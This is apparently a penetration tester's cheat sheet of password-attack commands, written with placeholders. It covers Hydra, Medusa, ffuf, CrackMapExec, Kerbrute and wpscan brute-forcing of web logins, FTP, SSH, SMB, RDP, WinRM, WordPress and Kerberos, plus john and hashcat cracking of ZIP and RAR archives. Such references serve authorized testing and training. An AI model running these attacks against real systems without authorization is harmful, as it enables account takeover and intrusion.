Wordlists
/usr/share/wordlists/SecLists/..
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/fasttrack.txt
rules :
/usr/share/hashcat/rules/best64.rule
/usr/share/hashcat/rules/rockyou-30000.rule
HTTP LOGIN
FFuF
ffuf -u <url> -w <wordlist.txt> -X POST -d "username=<username>&password=FUZZ" <filter>
FILTER OPTIONS:
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fmode Filter set operator. Either of: and, or (default: or)
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-ft Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
Hydra
hydra -l <username> -P <passwords.txt> <IP> http-post-form "/login:username=^USER^&password=^PASS^:F=Login failed !" -V
Basic Auth Http :
hydra -l <username> -P <passwords.txt> -f <IP> http-get
Basic Auth Https :
hydra -l <username> -P <passwords.txt> -f <IP> https-get
FTP
Hydra
hydra -l <username> -P <passwords.txt> <IP> ftp
hydra -L <username.txt> -p "<password>" <IP> ftp
Medusa
medusa -h <IP> -U <username-list> -P <password-list> -M ftp -T <thread-count>
SSH
Hydra
hydra -l <username> -P <passwords.txt> -s 22 <IP> ssh
hydra -L <usernames.txt> -p "<password>" -s 22 <IP> ssh
Medusa
medusa -h <IP> -U <username-list> -P <password-list> -M ssh -T <thread-count>
SMB
CrackMapExec (à privilégier)
crackmapexec smb $M1 -u <usernames.txt> -p <passwords.txt> --continue-on-success
Hydra
hydra -l <username> -P <passwords.txt> <IP> smb
hydra -L <usernames.txt> -p "<password>" <IP> smb
RDP
Hydra
hydra -l <username> -P <passwords.txt> <IP> rdp
hydra -L <username.txt> -p "<password>" <IP> rdp
WinRM
CrackMapExec
crackmapexec winrm <IP> -d <domain-name> -u <usernames.txt> -p <passwords.txt>
WordPress
Hydra
hydra -l <username> -P <passwords.txt> <IP> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
Medusa
medusa -h <target-ip> -U <username-list> -P <password-list> -M smbnt -T <thread-count>
Kerberos
Kerbrute
kerbrute userenum --dc <domain-controller-ip> -d <domain-name> <username-list>
WordPress
wpscan --url <url-login-page> -U <users.txt> -P <passwords.txt>
ZIP
john the ripper
zip2john <zip-file> > zip-hash.txt
john --format=zip zip-hash.txt --wordlist=<wordlist.txt>
hashcat
hashcat -m 13600 <hash-file> <wordlist.txt>
RAR
unrar
unrar x -p <password> <rar-file>
john the ripper
rar2john <rar-file> > rar-hash.txt
john --format=rar rar-hash.txt --wordlist=<wordlist.txt>
hashcat
hashcat -m 12500 <hash-file> <wordlist.txt>